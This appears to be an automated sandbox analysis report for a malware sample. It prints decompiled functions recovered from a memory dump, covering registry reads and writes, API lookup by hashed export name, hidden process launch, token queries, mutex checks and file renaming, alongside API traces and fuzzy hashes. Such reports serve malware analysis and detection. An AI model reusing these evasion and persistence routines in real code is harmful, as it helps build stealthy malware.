0x0360bfd2
0x0360bfd5
0x0360bfd7
0x0360bfdf
0x0360bfdf
0x0360bfe2
0x0360bfe4
0x00000000
0x0360bfe4
0x0360bf9f
0x0360bfa1
0x0360bfa7
0x00000000
0x00000000
0x0360bfc3
0x0360bff0
0x0360bff3
0x00000000
0x0360bff3
0x0360bfcb
0x00000000
0x0360bfd1
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000000,00000000,?,?,03602C08,00000000), ref: 0360BF69
RegQueryValueExW.KERNELBASE(00000000,03602C08,00000000,?,00000000,03602C08,00000000,?,?,03602C08,00000000), ref: 0360BF8D
RegQueryValueExW.KERNELBASE(00000000,03602C08,00000000,00000000,00000000,03602C08,?,?,03602C08,00000000), ref: 0360BFBB
RegCloseKey.KERNELBASE(00000000,?,?,03602C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0360BFF0

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 444e34a2df4628c754d712074b2b90522dccedd057d90ce601a13d34c82724e3
Instruction ID: 9bb72e16af534e3f84edfb058fc4f2a8dda0f9ef22a08097c4c88ae27107e8a8
Opcode Fuzzy Hash: 444e34a2df4628c754d712074b2b90522dccedd057d90ce601a13d34c82724e3
Instruction Fuzzy Hash: 16213A75900208FFCB14DBA5DC05EAFBBB8EB45700B1581AAB501E7154E731CA10DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0360BEA6, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360BEA6(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E036085EA(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x0360beb9
0x0360bec3
0x0360bec6
0x0360bece
0x00000000
0x0360bed0
0x0360bed7
0x0360bef1
0x0360befd
0x0360bf02
0x0360bf20
0x0360bf25
0x0360bf2a
0x0360bf2a
0x0360bf25
0x0360bf02
0x0360bf2f
0x0360bf39
0x0360bf39
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,0530F9F0,00000000,?,00000002), ref: 0360BEC9
RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0360BEEC
RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0360BF19
RegCloseKey.KERNELBASE(?,?,00000002), ref: 0360BF39

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: b9947fde0fcba9e81404b7b4225b702eb73ce67b7f3f6d19925f008830e18b30
Instruction ID: b8f018686481d4dc9318f7d055b67365090fc70a06a725f46936a066b9cb96a1
Opcode Fuzzy Hash: b9947fde0fcba9e81404b7b4225b702eb73ce67b7f3f6d19925f008830e18b30
Instruction Fuzzy Hash: 0721EAB5A00248BFCB19DFA9D945DAFBBBCEF85700B058195F901D7254D730DA10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0360DFB8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360DFB8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0360D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0360C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x0360dfc1
0x0360dfc3
0x0360dfc6
0x0360dfc9
0x0360dfcf
0x0360e02c
0x00000000
0x0360e02c
0x0360dfd1
0x0360dfdc
0x0360dfdf
0x0360dfe4
0x0360dfe9
0x0360dfec
0x0360dfee
0x0360dff1
0x0360dff4
0x0360dff9
0x00000000
0x00000000
0x00000000
0x00000000
0x0360dffb
0x0360dffb
0x0360e00d
0x0360e01a
0x0360e01e
0x00000000
0x00000000
0x0360e020
0x0360e023
0x0360e024
0x0360e02a
0x00000000
0x00000000
0x00000000
0x0360e02a
0x0360e041
0x0360e046
0x0360e04a
0x00000000
0x0360e056
0x0360e056
0x0360e058
0x0360e058
0x0360e05e
0x00000000
0x00000000
0x0360e064
0x0360e068
0x0360e06c
0x00000000
0x00000000
0x00000000
0x0360e06c
0x0360e072
0x0360e07a
0x0360e07f
0x0360e082
0x0360e082
0x0360e084
0x0360e088
0x0360e090
0x00000000
0x00000000
0x0360e094
0x0360e09c
0x00000000
0x00000000
0x00000000
0x0360e09c

APIs

LoadLibraryA.KERNELBASE(.dll,0360604A,0000011C,00000000), ref: 0360E088
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0360E094

Strings

.dll, xrefs: 0360E084, 0360E087

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: e8d9c10082e60b928be0ae4bb1cb428fd3464872b6c061c2aaa6c62e03aee741
Instruction ID: 37c869a92bc4d96938bf30fa061d90a24b5e38694dc76b080d73d04c2617edf8
Opcode Fuzzy Hash: e8d9c10082e60b928be0ae4bb1cb428fd3464872b6c061c2aaa6c62e03aee741
Instruction Fuzzy Hash: 2631B435A006299BDB28CF6DCA817AFFBE5AF44204F284869C846D7385D771E952C790

Uniqueness

Uniqueness Score: -1.00%

Function 0360A091, Relevance: 4.6, APIs: 3, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0360A091(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0360D40B( &_v12, _t103);
					_t93 = _t107 + __edx;
					E0361230C(_t107 + __edx,  &_v2832);
					_t54 = E03612438(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E036085EA(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E036086C7(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E036122DE( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0360F49B( &_v16, _t104);
						E0360EACC( &_v16,  &_v52, 0x14,  &_v328);
						E0360EB39(_t106, _v20,  &_v328);
						_t73 = E03609AF4(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E03609786(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E03608600( &_v12, 0xffffffff);
						}
						E03608600( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x0360a09e
0x0360a0a3
0x0360a0a5
0x0360a0a8
0x0360a217
0x0360a217
0x0360a217
0x00000000
0x0360a0b8
0x0360a0b8
0x0360a0ba
0x00000000
0x00000000
0x0360a0c0
0x0360a0c9
0x0360a0cc
0x0360a0cd
0x0360a0d5
0x0360a0d8
0x0360a0e3
0x0360a0f3
0x0360a0f8
0x0360a0fb
0x0360a104
0x0360a10c
0x0360a111
0x0360a116
0x0360a123
0x0360a125
0x0360a12c
0x0360a131
0x0360a134
0x0360a13c
0x0360a149
0x0360a14e
0x0360a154
0x0360a15d
0x0360a163
0x0360a166
0x0360a167
0x0360a179
0x0360a189
0x0360a195
0x0360a19a
0x0360a19d
0x0360a19f
0x0360a1a9
0x0360a1c4
0x0360a1c7
0x0360a1c9
0x0360a1e4
0x0360a1e7
0x0360a1e9
0x0360a1eb
0x0360a1ed
0x0360a1ed
0x0360a1f6
0x0360a1cb
0x0360a1cb
0x0360a1cd
0x0360a1cd
0x0360a1ff
0x0360a205
0x0360a20c
0x00000000
0x0360a213
0x0360a11a
0x00000000
0x0360a11a

APIs

Part of subcall function 03612438: _ftol2_sse.MSVCRT ref: 03612499

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 0360A1C4

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: 83520714c816e96237f25e5051467681b421479c4845aa891e04be96b12e0dd3
Instruction ID: 0f09ec83fc9ac4bf6cebabe47d2e66177d407a7d18a07834d7c266a164a4156f
Opcode Fuzzy Hash: 83520714c816e96237f25e5051467681b421479c4845aa891e04be96b12e0dd3
Instruction Fuzzy Hash: 72516D76900319ABCF15DF94CC41FDFBBB8AB04350F14416AE514AB2D0EB719655CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0360A8F7, Relevance: 4.6, APIs: 3, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0360A8F7(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x361e684; // 0x530f6c8
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x0360a902
0x0360a90b
0x0360a912
0x0360a91a
0x0360a91e
0x0360a91f
0x0360a920
0x0360a921
0x0360a922
0x0360a927
0x0360a92b
0x0360a92e
0x0360a92e
0x0360a93b
0x0360a957
0x0360a994
0x0360a959
0x0360a95c
0x0360a95e
0x0360a961
0x0360a966
0x0360a96e
0x0360a976
0x0360a976
0x0360a96e
0x0360a97c
0x0360a984
0x0360a987
0x0360a98f
0x0360a98f
0x0360a99c

APIs

memset.MSVCRT ref: 0360A90B
CreateProcessW.KERNELBASE(00000000,00001388,00000000,00000000,00000000,0360C1B6,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0360A952
GetExitCodeProcess.KERNEL32 ref: 0360A976

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Process$CodeCreateExitmemset
String ID:
API String ID: 4170947310-0
Opcode ID: a0423baa8e5e394ee16fbc09ff86552e93c967d6cd67b5bd56c8a1a3ebb77114
Instruction ID: 751826f19a2edc8de3e347323608c1c468e61f88dbad417ceba71ea1f04b5a02
Opcode Fuzzy Hash: a0423baa8e5e394ee16fbc09ff86552e93c967d6cd67b5bd56c8a1a3ebb77114
Instruction Fuzzy Hash: 05215E72A20218BFDF41AFE9DD85DAFBB7CFF08240B051429FA15E6164D631D810CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0360B97E, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0360B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E036085EA(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E03608600( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0360b981
0x0360b982
0x0360b989
0x0360b991
0x0360b995
0x0360b99e
0x0360b9e4
0x0360b9e4
0x0360b9ab
0x0360b9b3
0x0360b9b5
0x0360b9bb
0x0360b9d4
0x00000000
0x0360b9d6
0x0360b9db
0x00000000
0x0360b9e1
0x0360b9bd
0x0360b9bd
0x0360b9bd
0x0360b9bd
0x0360b9bb
0x0360b9ea

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,0360BA1D,?,00000000,?,0360D0B3), ref: 0360B999
GetLastError.KERNEL32(?,0360BA1D,?,00000000,?,0360D0B3), ref: 0360B9A0

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0360BA1D,?,00000000,?,0360D0B3), ref: 0360B9CF

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 322885caa0d6aac9d392ef5ff5dd1e278bb81913366603dd139470ec0ecb3421
Instruction ID: 321a190ca7bf092faa0bbc7867fe9793a5145eef49c645cac7a303199a3fed15
Opcode Fuzzy Hash: 322885caa0d6aac9d392ef5ff5dd1e278bb81913366603dd139470ec0ecb3421
Instruction Fuzzy Hash: 7A01AD72600224BFCB28EAA5DD4ADAF7FACEE466A4711456AF805E7344E630DD0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 036058F4, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E036058F4(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0360A4A5(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x361e684; // 0x530f6c8
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x036058f8
0x036058fd
0x03605909
0x03605916
0x0360591a
0x03605932
0x03605952
0x03605953
0x03605942
0x03605942
0x03605948
0x03605948
0x0360591c
0x0360591c
0x03605922
0x03605922
0x036058ff
0x036058ff
0x036058ff
0x0360595b

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,036059B5,03605DBC,Global,0361BA10,?,00000000,?,00000002), ref: 03605910
GetLastError.KERNEL32(?,?,036059B5,03605DBC,Global,0361BA10,?,00000000,?,00000002), ref: 0360591C

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 0c288f6236e49d55abec98d8383399927027a9436071240a503aaa5e588367be
Instruction ID: c6ceb743070081fad4859711ee6730bc697f83c36d1110e15faf3554ea2057bf
Opcode Fuzzy Hash: 0c288f6236e49d55abec98d8383399927027a9436071240a503aaa5e588367be
Instruction Fuzzy Hash: 87F02D31204250CBCB189759D445D3B765CEB972317460366FABAC72C4CB708C014BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0360A457, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360A457(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0360A4A5(_t17, _t16) < 0) {
						_t8 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x0360a463
0x0360a46b
0x0360a46f
0x0360a486
0x0360a495
0x0360a49b
0x0360a49e
0x0360a49e
0x00000000
0x0360a4a0
0x0360a471
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,03604E18,00000000), ref: 0360A465
GetLastError.KERNEL32 ref: 0360A471
GetLastError.KERNEL32 ref: 0360A47B

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: aaa39c5294968c51c287cbca6eb1bccef3839c393b3d5b3aee33284198e91ab4
Instruction ID: b7edd333da42d8262693c5f9dea62f6f6f3b94bf4a56e4e4e35c772274180d61
Opcode Fuzzy Hash: aaa39c5294968c51c287cbca6eb1bccef3839c393b3d5b3aee33284198e91ab4
Instruction Fuzzy Hash: 41F0E5393103209BD714A7A5D40DF5B369EAFE46A1F4A0475F805CB288DA60CC0183F1

Uniqueness

Uniqueness Score: -1.00%

Function 0360AFF8, Relevance: 3.8, APIs: 3, Instructions: 72
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0360AFF8(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x361e698; // 0x530f9a0
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0360B92C(_t39);
				_t26 =  *0x361e6b8; // 0x530f9b0
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x361e688; // 0x33f0000
					if(E0360BB73( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x361e698; // 0x530f9a0
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0360C39D( &_v528) * 2, 0x104);
				return 1;
			}

0x0360aff8
0x0360b009
0x0360b01b
0x0360b01d
0x0360b02b
0x0360b03a
0x0360b045
0x0360b04d
0x0360b05a
0x0360b060
0x0360b064
0x0360b066
0x0360b07a
0x0360b083
0x0360b08e
0x0360b08e
0x0360b07a
0x0360b091
0x0360b098
0x0360b0b6
0x0360b0c3

APIs

memset.MSVCRT ref: 0360B01D
memset.MSVCRT ref: 0360B02B

Part of subcall function 0360B92C: GetCurrentThread.KERNEL32 ref: 0360B93F
Part of subcall function 0360B92C: GetLastError.KERNEL32(?,?,0360BA62,73BCF500,10000000), ref: 0360B94D
Part of subcall function 0360B92C: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0360BA62,73BCF500,10000000), ref: 0360B966

lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0360B0B6

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Currentmemset$ErrorLastProcessThreadlstrcpyn
String ID:
API String ID: 4088293216-0
Opcode ID: a28ab0c6401b69f788f1b18b6f5623a48d03c628a11480284827d6a15711bd5a
Instruction ID: b60a74ed50caffe905d1a2588e66c815060e9fc83eebb0def15cac1e0afc23f0
Opcode Fuzzy Hash: a28ab0c6401b69f788f1b18b6f5623a48d03c628a11480284827d6a15711bd5a
Instruction Fuzzy Hash: 5D21A1B150121CAFE714EBA4CD89EEB73BCEB04304F0440A5F606E7181DB70DE458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03606D86, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E03606D86(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x361e778; // 0x530f9f0
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E03609EB6(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x361e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x361e688; // 0x33f0000
						_t10 = E0360EDDA(_t49 + 0xb0, _t51, _t66);
						 *0x361e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x361e688; // 0x33f0000
					_push(0x361bd00);
					_t9 = E036092CB(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x361e688; // 0x33f0000
							_t56 = E0360A457(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0360B24F(_t59) == 0) {
								_t32 = E0360F15A(_t59, 0x1388, _t74);
							}
							E0360A4C1(_t56);
							_t41 =  *0x361e684; // 0x530f6c8
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E036097F2( &_v544);
								_t43 =  *0x361e778; // 0x530f9f0
								_t53 = 0x33;
								if(E03609EB6(_t43, _t53) != 0) {
									L12:
									__eflags = E03601C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0360B197(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x361e778; // 0x530f9f0
									_t53 = 0x12;
									_t22 = E03609EB6(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0360A4D5(_t53, _t72) != 0) {
										_push(E036097F2(0));
										E03609626( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E03608600( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x03606d86
0x03606d8c
0x03606d92
0x03606d9f
0x03606da0
0x03606da1
0x03606da8
0x03606dae
0x03606db3
0x03606db5
0x03606db7
0x03606dc3
0x03606dc8
0x03606dc8
0x03606dcd
0x03606dcf
0x03606dd0
0x03606dda
0x03606de0
0x03606de5
0x03606de7
0x03606dea
0x03606df0
0x03606df6
0x03606df6
0x03606e0c
0x03606e10
0x00000000
0x00000000
0x03606e1f
0x03606e28
0x03606e28
0x03606e2c
0x03606e31
0x03606e38
0x03606e3d
0x03606e43
0x03606e48
0x03606e50
0x03606e58
0x03606ea6
0x03606ead
0x03606eaf
0x03606eb3
0x00000000
0x03606eb3
0x03606e5a
0x03606e5a
0x03606e62
0x03606e63
0x03606e68
0x03606e6a
0x03606e7c
0x03606e8d
0x03606e92
0x03606e9b
0x00000000
0x00000000
0x00000000
0x00000000
0x03606e6a
0x03606e58
0x00000000
0x03606e3d
0x03606ec4
0x03606eca
0x03606df0
0x03606ed1

APIs

MoveFileW.KERNEL32(00000000,?), ref: 03606E9B

Strings

%s.%u, xrefs: 03606E7E

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: 8ac49edf46dea66255f3977b9f6526caf452e0068dd4905e8932b080adc00ad8
Instruction ID: 73904244a68c092c51939e90896a1fe1272feb5c04993c833d5a908cbac651db
Opcode Fuzzy Hash: 8ac49edf46dea66255f3977b9f6526caf452e0068dd4905e8932b080adc00ad8
Instruction Fuzzy Hash: FE31CF393043005BE31CFA64DA8BE6F739ADF81620F08442DE9258F2C5EF21D912C799

Uniqueness

Uniqueness Score: -1.00%

